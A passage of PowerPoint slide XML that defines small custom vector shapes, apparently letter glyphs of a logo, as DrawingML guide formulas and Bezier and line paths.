                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="22" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="11" y="5"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="8" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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46"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9596438" y="4627563"/>
                  <a:ext cx="34925" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 15"/>
                    <a:gd name="T1" fmla="*/ 3 h 17"/>
                    <a:gd name="T2" fmla="*/ 14 w 15"/>
                    <a:gd name="T3" fmla="*/ 4 h 17"/>
                    <a:gd name="T4" fmla="*/ 12 w 15"/>
                    <a:gd name="T5" fmla="*/ 2 h 17"/>
                    <a:gd name="T6" fmla="*/ 8 w 15"/>
                    <a:gd name="T7" fmla="*/ 1 h 17"/>
                    <a:gd name="T8" fmla="*/ 5 w 15"/>
                    <a:gd name="T9" fmla="*/ 2 h 17"/>
                    <a:gd name="T10" fmla="*/ 2 w 15"/>
                    <a:gd name="T11" fmla="*/ 5 h 17"/>
                    <a:gd name="T12" fmla="*/ 1 w 15"/>
                    <a:gd name="T13" fmla="*/ 8 h 17"/>
                    <a:gd name="T14" fmla="*/ 3 w 15"/>
                    <a:gd name="T15" fmla="*/ 13 h 17"/>
                    <a:gd name="T16" fmla="*/ 8 w 15"/>
                    <a:gd name="T17" fmla="*/ 15 h 17"/>
                    <a:gd name="T18" fmla="*/ 14 w 15"/>
                    <a:gd name="T19" fmla="*/ 13 h 17"/>
                    <a:gd name="T20" fmla="*/ 15 w 15"/>
                    <a:gd name="T21" fmla="*/ 14 h 17"/>
                    <a:gd name="T22" fmla="*/ 12 w 15"/>
                    <a:gd name="T23" fmla="*/ 16 h 17"/>
                    <a:gd name="T24" fmla="*/ 8 w 15"/>
                    <a:gd name="T25" fmla="*/ 17 h 17"/>
                    <a:gd name="T26" fmla="*/ 2 w 15"/>
                    <a:gd name="T27" fmla="*/ 14 h 17"/>
                    <a:gd name="T28" fmla="*/ 0 w 15"/>
                    <a:gd name="T29" fmla="*/ 8 h 17"/>
                    <a:gd name="T30" fmla="*/ 2 w 15"/>
                    <a:gd name="T31" fmla="*/ 2 h 17"/>
                    <a:gd name="T32" fmla="*/ 8 w 15"/>
                    <a:gd name="T33" fmla="*/ 0 h 17"/>
                    <a:gd name="T34" fmla="*/ 12 w 15"/>
                    <a:gd name="T35" fmla="*/ 1 h 17"/>
                    <a:gd name="T36" fmla="*/ 15 w 15"/>
                    <a:gd name="T3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7">
                      <a:moveTo>
                        <a:pt x="15" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="2"/>
                        <a:pt x="10" y="1"/>
                        <a:pt x="8" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="2" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="10"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="3" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="8" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="15"/>
                        <a:pt x="13" y="14"/>
                        <a:pt x="14" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="14"/>
                        <a:pt x="15" y="14"/>
                        <a:pt x="15" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="15"/>
                        <a:pt x="14" y="15"/>
                        <a:pt x="12" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="16"/>
                        <a:pt x="10" y="17"/>
                        <a:pt x="8" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="17"/>
                        <a:pt x="3" y="16"/>
                        <a:pt x="2" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="10"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="11" y="0"/>
                        <a:pt x="12" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="1"/>
                        <a:pt x="15" y="2"/>
                        <a:pt x="1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47"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9636125" y="4627563"/>
                  <a:ext cx="20638" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 13"/>
                    <a:gd name="T1" fmla="*/ 2 h 23"/>
                    <a:gd name="T2" fmla="*/ 0 w 13"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 13 w 13"/>
                    <a:gd name="T5" fmla="*/ 0 h 23"/>
                    <a:gd name="T6" fmla="*/ 13 w 13"/>
                    <a:gd name="T7" fmla="*/ 2 h 23"/>
                    <a:gd name="T8" fmla="*/ 7 w 13"/>
                    <a:gd name="T9" fmla="*/ 2 h 23"/>
                    <a:gd name="T10" fmla="*/ 7 w 13"/>
                    <a:gd name="T11" fmla="*/ 23 h 23"/>
                    <a:gd name="T12" fmla="*/ 6 w 13"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 6 w 13"/>
                    <a:gd name="T15" fmla="*/ 2 h 23"/>
                    <a:gd name="T16" fmla="*/ 0 w 13"/>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3">
                      <a:moveTo>
                        <a:pt x="0" y="2"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6"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48"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9656763" y="4627563"/>
                  <a:ext cx="23813" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 10"/>
                    <a:gd name="T1" fmla="*/ 13 h 17"/>
                    <a:gd name="T2" fmla="*/ 2 w 10"/>
                    <a:gd name="T3" fmla="*/ 13 h 17"/>
                    <a:gd name="T4" fmla="*/ 5 w 10"/>
                    <a:gd name="T5" fmla="*/ 15 h 17"/>
                    <a:gd name="T6" fmla="*/ 7 w 10"/>
                    <a:gd name="T7" fmla="*/ 15 h 17"/>
                    <a:gd name="T8" fmla="*/ 8 w 10"/>
                    <a:gd name="T9" fmla="*/ 14 h 17"/>
                    <a:gd name="T10" fmla="*/ 8 w 10"/>
                    <a:gd name="T11" fmla="*/ 12 h 17"/>
                    <a:gd name="T12" fmla="*/ 8 w 10"/>
                    <a:gd name="T13" fmla="*/ 11 h 17"/>
                    <a:gd name="T14" fmla="*/ 5 w 10"/>
                    <a:gd name="T15" fmla="*/ 8 h 17"/>
                    <a:gd name="T16" fmla="*/ 2 w 10"/>
                    <a:gd name="T17" fmla="*/ 6 h 17"/>
                    <a:gd name="T18" fmla="*/ 1 w 10"/>
                    <a:gd name="T19" fmla="*/ 4 h 17"/>
                    <a:gd name="T20" fmla="*/ 2 w 10"/>
                    <a:gd name="T21" fmla="*/ 2 h 17"/>
                    <a:gd name="T22" fmla="*/ 3 w 10"/>
                    <a:gd name="T23" fmla="*/ 0 h 17"/>
                    <a:gd name="T24" fmla="*/ 5 w 10"/>
                    <a:gd name="T25" fmla="*/ 0 h 17"/>
                    <a:gd name="T26" fmla="*/ 7 w 10"/>
                    <a:gd name="T27" fmla="*/ 0 h 17"/>
                    <a:gd name="T28" fmla="*/ 10 w 10"/>
                    <a:gd name="T29" fmla="*/ 3 h 17"/>
                    <a:gd name="T30" fmla="*/ 8 w 10"/>
                    <a:gd name="T31" fmla="*/ 4 h 17"/>
                    <a:gd name="T32" fmla="*/ 7 w 10"/>
                    <a:gd name="T33" fmla="*/ 2 h 17"/>
                    <a:gd name="T34" fmla="*/ 5 w 10"/>
                    <a:gd name="T35" fmla="*/ 2 h 17"/>
                    <a:gd name="T36" fmla="*/ 4 w 10"/>
                    <a:gd name="T37" fmla="*/ 2 h 17"/>
                    <a:gd name="T38" fmla="*/ 3 w 10"/>
                    <a:gd name="T39" fmla="*/ 4 h 17"/>
                    <a:gd name="T40" fmla="*/ 3 w 10"/>
                    <a:gd name="T41" fmla="*/ 5 h 17"/>
                    <a:gd name="T42" fmla="*/ 4 w 10"/>
                    <a:gd name="T43" fmla="*/ 6 h 17"/>
                    <a:gd name="T44" fmla="*/ 6 w 10"/>
                    <a:gd name="T45" fmla="*/ 7 h 17"/>
                    <a:gd name="T46" fmla="*/ 9 w 10"/>
                    <a:gd name="T47" fmla="*/ 10 h 17"/>
                    <a:gd name="T48" fmla="*/ 10 w 10"/>
                    <a:gd name="T49" fmla="*/ 12 h 17"/>
                    <a:gd name="T50" fmla="*/ 8 w 10"/>
                    <a:gd name="T51" fmla="*/ 15 h 17"/>
                    <a:gd name="T52" fmla="*/ 5 w 10"/>
                    <a:gd name="T53" fmla="*/ 17 h 17"/>
                    <a:gd name="T54" fmla="*/ 3 w 10"/>
                    <a:gd name="T55" fmla="*/ 16 h 17"/>
                    <a:gd name="T56" fmla="*/ 0 w 10"/>
                    <a:gd name="T57"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 h="17">
                      <a:moveTo>
                        <a:pt x="0" y="13"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="13"/>
                        <a:pt x="2" y="13"/>
                        <a:pt x="2" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="14"/>
                        <a:pt x="4" y="15"/>
                        <a:pt x="5" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="15"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="7" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="15"/>
                        <a:pt x="7" y="14"/>
                        <a:pt x="8" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="13"/>
                        <a:pt x="8" y="13"/>
                        <a:pt x="8" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="8" y="11"/>
                        <a:pt x="8" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="10"/>
                        <a:pt x="6" y="9"/>
                        <a:pt x="5" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="7"/>
                        <a:pt x="3" y="7"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="5"/>
                        <a:pt x="1" y="5"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="1"/>
                        <a:pt x="3" y="1"/>
                        <a:pt x="3" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="9" y="2"/>
                        <a:pt x="10" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="3"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="7" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="2"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="4" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="5"/>
                        <a:pt x="4" y="5"/>
                        <a:pt x="4" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="5" y="6"/>
                        <a:pt x="6" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="8"/>
                        <a:pt x="9" y="9"/>
                        <a:pt x="9" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="11"/>
                        <a:pt x="10" y="12"/>
                        <a:pt x="10" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="14"/>
                        <a:pt x="9" y="15"/>
                        <a:pt x="8" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="16"/>
                        <a:pt x="7" y="17"/>
                        <a:pt x="5" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="17"/>
                        <a:pt x="3" y="16"/>
                        <a:pt x="3" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="15"/>
                        <a:pt x="1" y="15"/>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249"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9686925" y="4635501"/>
                  <a:ext cx="6350" cy="30163"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 3"/>
                    <a:gd name="T1" fmla="*/ 0 h 13"/>
                    <a:gd name="T2" fmla="*/ 3 w 3"/>
                    <a:gd name="T3" fmla="*/ 1 h 13"/>
                    <a:gd name="T4" fmla="*/ 3 w 3"/>
                    <a:gd name="T5" fmla="*/ 2 h 13"/>
                    <a:gd name="T6" fmla="*/ 3 w 3"/>
                    <a:gd name="T7" fmla="*/ 2 h 13"/>
                    <a:gd name="T8" fmla="*/ 2 w 3"/>
                    <a:gd name="T9" fmla="*/ 3 h 13"/>
                    <a:gd name="T10" fmla="*/ 1 w 3"/>
                    <a:gd name="T11" fmla="*/ 2 h 13"/>
                    <a:gd name="T12" fmla="*/ 0 w 3"/>
                    <a:gd name="T13" fmla="*/ 2 h 13"/>
                    <a:gd name="T14" fmla="*/ 1 w 3"/>
                    <a:gd name="T15" fmla="*/ 1 h 13"/>
                    <a:gd name="T16" fmla="*/ 2 w 3"/>
                    <a:gd name="T17" fmla="*/ 0 h 13"/>
                    <a:gd name="T18" fmla="*/ 2 w 3"/>
                    <a:gd name="T19" fmla="*/ 10 h 13"/>
                    <a:gd name="T20" fmla="*/ 3 w 3"/>
                    <a:gd name="T21" fmla="*/ 10 h 13"/>
                    <a:gd name="T22" fmla="*/ 3 w 3"/>
                    <a:gd name="T23" fmla="*/ 11 h 13"/>
                    <a:gd name="T24" fmla="*/ 3 w 3"/>
                    <a:gd name="T25" fmla="*/ 12 h 13"/>
                    <a:gd name="T26" fmla="*/ 2 w 3"/>
                    <a:gd name="T27" fmla="*/ 13 h 13"/>
                    <a:gd name="T28" fmla="*/ 1 w 3"/>
                    <a:gd name="T29" fmla="*/ 12 h 13"/>
                    <a:gd name="T30" fmla="*/ 0 w 3"/>
                    <a:gd name="T31" fmla="*/ 11 h 13"/>
                    <a:gd name="T32" fmla="*/ 1 w 3"/>
                    <a:gd name="T33" fmla="*/ 10 h 13"/>
                    <a:gd name="T34" fmla="*/ 2 w 3"/>
                    <a:gd name="T3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13">
                      <a:moveTo>
                        <a:pt x="2" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="0"/>
                        <a:pt x="3" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="1"/>
                        <a:pt x="3" y="1"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="2"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="2" y="3"/>
                        <a:pt x="2" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="1"/>
                        <a:pt x="1" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="0"/>
                        <a:pt x="1" y="0"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2" y="10"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="10"/>
                        <a:pt x="3" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="11"/>
                        <a:pt x="3" y="11"/>
                        <a:pt x="3" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="12"/>
                        <a:pt x="3" y="12"/>
                        <a:pt x="3" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="13"/>
                        <a:pt x="2" y="13"/>
                        <a:pt x="2" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="1" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="10"/>
                        <a:pt x="1" y="10"/>
                        <a:pt x="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50"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9717088" y="4627563"/>
                  <a:ext cx="26988" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17"/>
                    <a:gd name="T1" fmla="*/ 23 h 23"/>
                    <a:gd name="T2" fmla="*/ 0 w 17"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 0 h 23"/>
                    <a:gd name="T6" fmla="*/ 16 w 17"/>
                    <a:gd name="T7" fmla="*/ 18 h 23"/>
                    <a:gd name="T8" fmla="*/ 16 w 17"/>
                    <a:gd name="T9" fmla="*/ 0 h 23"/>
                    <a:gd name="T10" fmla="*/ 17 w 17"/>
                    <a:gd name="T11" fmla="*/ 0 h 23"/>
                    <a:gd name="T12" fmla="*/ 17 w 17"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 17 w 17"/>
                    <a:gd name="T15" fmla="*/ 23 h 23"/>
                    <a:gd name="T16" fmla="*/ 1 w 17"/>
                    <a:gd name="T17" fmla="*/ 5 h 23"/>
                    <a:gd name="T18" fmla="*/ 1 w 17"/>
                    <a:gd name="T19" fmla="*/ 23 h 23"/>
                    <a:gd name="T20" fmla="*/ 0 w 17"/>
                    <a:gd name="T2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3">
                      <a:moveTo>
                        <a:pt x="0" y="23"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="23"/>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51"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9752013" y="4627563"/>
                  <a:ext cx="38100" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 9 w 17"/>
                    <a:gd name="T1" fmla="*/ 0 h 17"/>
                    <a:gd name="T2" fmla="*/ 15 w 17"/>
                    <a:gd name="T3" fmla="*/ 2 h 17"/>
                    <a:gd name="T4" fmla="*/ 17 w 17"/>
                    <a:gd name="T5" fmla="*/ 8 h 17"/>
                    <a:gd name="T6" fmla="*/ 15 w 17"/>
                    <a:gd name="T7" fmla="*/ 14 h 17"/>
                    <a:gd name="T8" fmla="*/ 9 w 17"/>
                    <a:gd name="T9" fmla="*/ 17 h 17"/>
                    <a:gd name="T10" fmla="*/ 3 w 17"/>
                    <a:gd name="T11" fmla="*/ 14 h 17"/>
                    <a:gd name="T12" fmla="*/ 0 w 17"/>
                    <a:gd name="T13" fmla="*/ 8 h 17"/>
                    <a:gd name="T14" fmla="*/ 1 w 17"/>
                    <a:gd name="T15" fmla="*/ 4 h 17"/>
                    <a:gd name="T16" fmla="*/ 5 w 17"/>
                    <a:gd name="T17" fmla="*/ 1 h 17"/>
                    <a:gd name="T18" fmla="*/ 9 w 17"/>
                    <a:gd name="T19" fmla="*/ 0 h 17"/>
                    <a:gd name="T20" fmla="*/ 9 w 17"/>
                    <a:gd name="T21" fmla="*/ 1 h 17"/>
                    <a:gd name="T22" fmla="*/ 5 w 17"/>
                    <a:gd name="T23" fmla="*/ 2 h 17"/>
                    <a:gd name="T24" fmla="*/ 3 w 17"/>
                    <a:gd name="T25" fmla="*/ 5 h 17"/>
                    <a:gd name="T26" fmla="*/ 2 w 17"/>
                    <a:gd name="T27" fmla="*/ 8 h 17"/>
                    <a:gd name="T28" fmla="*/ 4 w 17"/>
                    <a:gd name="T29" fmla="*/ 13 h 17"/>
                    <a:gd name="T30" fmla="*/ 9 w 17"/>
                    <a:gd name="T31" fmla="*/ 15 h 17"/>
                    <a:gd name="T32" fmla="*/ 12 w 17"/>
                    <a:gd name="T33" fmla="*/ 14 h 17"/>
                    <a:gd name="T34" fmla="*/ 15 w 17"/>
                    <a:gd name="T35" fmla="*/ 12 h 17"/>
                    <a:gd name="T36" fmla="*/ 16 w 17"/>
                    <a:gd name="T37" fmla="*/ 8 h 17"/>
                    <a:gd name="T38" fmla="*/ 15 w 17"/>
                    <a:gd name="T39" fmla="*/ 5 h 17"/>
                    <a:gd name="T40" fmla="*/ 12 w 17"/>
                    <a:gd name="T41" fmla="*/ 2 h 17"/>
                    <a:gd name="T42" fmla="*/ 9 w 17"/>
                    <a:gd name="T4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7">
                      <a:moveTo>
                        <a:pt x="9" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="13" y="1"/>
                        <a:pt x="15" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="4"/>
                        <a:pt x="17" y="6"/>
                        <a:pt x="17" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="11"/>
                        <a:pt x="16" y="13"/>
                        <a:pt x="15" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="16"/>
                        <a:pt x="11" y="17"/>
                        <a:pt x="9" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="17"/>
                        <a:pt x="4" y="16"/>
                        <a:pt x="3" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="1" y="5"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="5" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="9" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="9" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="10"/>
                        <a:pt x="3" y="12"/>
                        <a:pt x="4" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="7" y="15"/>
                        <a:pt x="9" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="15"/>
                        <a:pt x="11" y="15"/>
                        <a:pt x="12" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
